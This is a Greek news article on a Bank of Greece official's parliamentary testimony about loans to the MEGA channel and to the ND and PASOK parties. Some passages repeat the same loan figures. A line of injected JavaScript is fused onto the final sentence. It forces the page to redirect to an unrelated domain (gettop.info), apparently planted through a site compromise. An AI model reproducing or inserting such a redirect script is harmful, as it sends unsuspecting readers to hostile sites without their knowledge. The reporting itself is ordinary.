«Βόμβα» τραπεζίτη στην Εξεταστική: Δεν έβαλαν λεφτά οι μέτοχοι του Mega (BINTEO)

0
19

 

 

«Βόμβες» εξαπέλυσε κατά την πολύωρη κατάθεση του στην Εξεταστική Επιτροπή της Βουλής για τα δάνεια από τράπεζες σε κόμματα και Μέσα Ενημέρωσης ο διευθυντής της Διεύθυνσης Επιθεώρησης Εποπτευόμενων Εταιρειών της Τράπεζας της Ελλάδος, Γιώργος Πάσχας.

Ο κ. Πάσχας αναφέρθηκε αναλυτικά στο δάνειο των 98 εκατομμυρίων ευρώ του τηλεοπτικού σταθμού MEGA, το οποίο, χαρακτήρισε ως εξυπηρετούμενο.
Όπως σημείωσε “το αρχικό ομολογιακό δάνειο των 98 εκατομμυρίων έχει κατέβει στα 85, έπεσε 13 εκατομμύρια ευρώ μετά από καταβολές που έγιναν, ενώ η εταιρεία έχει πληρώσει και 18,5 εκατομμύρια τόκους”.

Επίσης τόνισε ότι “σήμερα, το υπόλοιπο διασφαλίζεται με τιμολόγια 20 εκατομμυρίων ευρώ, οπότε το υπόλοιπο φαίνεται ότι εξυπηρετείται”.
Ωστόσο όπως αποκάλυψε το πρόβλημα, για τον ΤΗΛΕΤΥΠΟ ήταν ότι ζήτησε αναδιάρθρωση με βάση το business plan, και για την αναδιάρθρωση αυτή προϋπόθεση ήταν αύξηση μετοχικού κεφαλαίου 15 εκατομμυρίων τη οποία όμως δεν έκαναν οι μέτοχοι.

Ο κ. Πάσχας μίλησε και για τις ταινιοθήκες των καναλιών που χρησιμοποιήθηκαν ως εγγυήσεις για τη λήψη δανείων και έκανε σημαντικές διευκρινίσεις σχετικά με την ειδοποιό διαφορά ανάμεσα στην ταινιοθήκη του ALTER και αυτή του MEGA. Όπως εξήγησε, η ταινιοθήκη του ALTER του ALTER δεν είχε ενεχυριαστεί στις τράπεζες, δεν υπήρχε αποτίμηση από τις τράπεζες και την αποτίμηση έκανε η ίδια η εταιρεία. Μια εταιρεία που ελεγχόταν από ορκωτούς λογιστές και ήταν εισηγμένη στο Χρηματιστήριο.

Στην πραγματικότητα, η αξία των ταινιοθηκών, ως άυλο περιουσιακό στοιχείο, πρέπει να αποτιμώνται ανά έτος και τόσο η υπεραξία τους, όσο και η υποαξία τους πρέπει να εγγράφονται στα βιβλία τους.

Αντίθετα με το ALTER, η ταινιοθήκη του MEGA και του ANTENNA, το μεγαλύτερο κομμάτι, είναι ιδιοπαραγωγές και έχουν κόστος και μπορούν να κάνουν απόσβεση και μπορεί η τράπεζα να καταλάβει αν είναι στοιχείο που γεννά έσοδα. Για το MEGA, ειδικά, η αποτίμηση για τα 105 εκατομμύρια αξία ταινιοθήκης έγινε από αναγνωρισμένο μεγάλο οίκο του Εξωτερικού.

Ο κ. Πάσχας είπε μεταξύ άλλων ότι η Τράπεζα της Ελλάδος δεν συμπεριέλαβε τα δάνεια των κομμάτων, κατά τη διάρκεια του ελέγχου που πραγματοποίησε στην Attica Bank την περίοδο 2011 – 2014, ενώ ανέφερε ότι το υπόλοιπο των δανείων της Ν.Δ. και του ΠΑΣΟΚ στην πρώην Αγροτική Τράπεζα (νυν Τράπεζα Πειραιώς) είναι 295 εκατ. ευρώ.

Επιπροσθέτως, εξήγησε ότι το 2010 έγινε τακτικός έλεγχος στην τότε Αγροτική Τράπεζα και εμφανίσθηκαν δάνεια στη Ν.Δ. και το ΠΑΣΟΚ, ύψους 205.620.006 ευρώ.

«Το λογιστικό υπόλοιπο όλων των δανείων σήμερα, είναι 295.227.000. Τα τελευταία δάνεια δόθηκαν το 2011, έκτοτε δεν δόθηκαν δάνεια.
Τα υπόλοιπα είναι μη καταλογισμένοι τόκοι. Έχουν ληφθεί προβλέψεις για 263 εκατ. από το 2010 και το 2011» κατέθεσε το στέλεχος της ΤτΕ και πρόσθεσε ότι «τα δάνεια του ΣΥΡΙΖΑ και του ΚΚΕ είναι ομαλής είσπραξης και δεν έχουν σχηματιστεί προβλέψεις ζημίας».

Ο πρόεδρος της Εξεταστικής επεσήμανε ότι παρότι είχαν σχηματιστεί προβλέψεις ζημίας το 2010 και το 2011, δόθηκαν δάνεια από την Attica Bank στη Ν.Δ. και το ΠΑΣΟΚ. «Είναι πολύ λίγα», επεσήμανε ο κ. Πάσχας.

«Είναι όμως παράβαση», σχολίασε ο Σωκράτης Φάμελλος.

Αναφορικά με τον έλεγχο που έγινε στην Attica Bank την περίοδο 2011 – 2014, ο κ. Πάσχας σημείωσε ότι δεν ελέγχθηκαν τα δάνεια των κομμάτων και γι’ αυτό το πόρισμα δεν εστάλη στην Εξεταστική, ενώ εστάλη το πόρισμα της περιόδου 2015 – 2016.

«Δεν ελέγχουμε όλους τους πελάτες. Ελέγξαμε την πιστοδοτική τακτική παίρνοντας ένα δείγμα από τους μεγάλους πιστούχους. Μέσα στο πόρισμα και στο δείγμα που κάναμε δεν υπάρχει κόμμα», συμπλήρωσε.

Επίσης, έγινε γνωστό από την κατάθεση του κ. Πάσχα ότι το υπόλοιπο των δανείων της ΝΔ και του ΠΑΣΟΚ στην πρώην Αγροτική Τράπεζα (νυν Τράπεζα Πειραιώς) είναι 295 εκατ. ευρώ.

Συγκεκριμένα, το 2010, βάσει του τακτικού ελέγχου στην τότε Αγροτική Τράπεζα, βρέθηκαν δάνεια στη ΝΔ και το ΠΑΣΟΚ, ύψους 205.620.006 ευρώ. Από το πόρισμα της ΤτΕ προκύπτει ότι «θα μπορούσε να σχηματιστεί πρόβλεψη για πιθανή ζημία της τράπεζας» και, σήμερα, “για το 90% των δανείων της ΝΔ και του ΠΑΣΟΚ έχει σχηματιστεί τέτοια πρόβλεψη”.

Σύμφωνα πάντα με τον κ. Πάσχα, «το λογιστικό υπόλοιπο όλων των δανείων σήμερα είναι 295.227.000, με τα τελευταία δάνεια από την Αγροτική Τράπεζα να έχουν δοθεί το 2011 και τα υπόλοιπα είναι μη καταλογισμένοι τόκοι. Υπάρχουν προβλέψεις για 263 εκατ. από το 2010 και το 2011».

Ο κ. Πάσχας ρωτήθηκε και για τα δάνεια του ΣΥΡΙΖΑ και του ΚΚΕ και, σύμφωνα με τον ίδιο, είναι ομαλής είσπραξης και γι αυτά δεν έχουν σχηματιστεί προβλέψεις ζημίας».

Την Τρίτη 4 Οκτωβρίου, αναμένεται η κατάθεση του πρώην διοικητή της Τράπεζας της Ελλάδος, Ηλία Προβόπουλου ενώ στις 11 του ίδιου μήνα έχει προσκληθεί ο νυν διοικητής της Τράπεζας, Γιάννης Στουρνάρας.

Σύμφωνα με το πρόγραμμα, την Τετάρτη 12 Οκτωβρίου έχει κληθεί να καταθέσει ο εκδότης της εφημερίδας «Πρώτο Θέμα» Θέμος Αναστασιάδης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here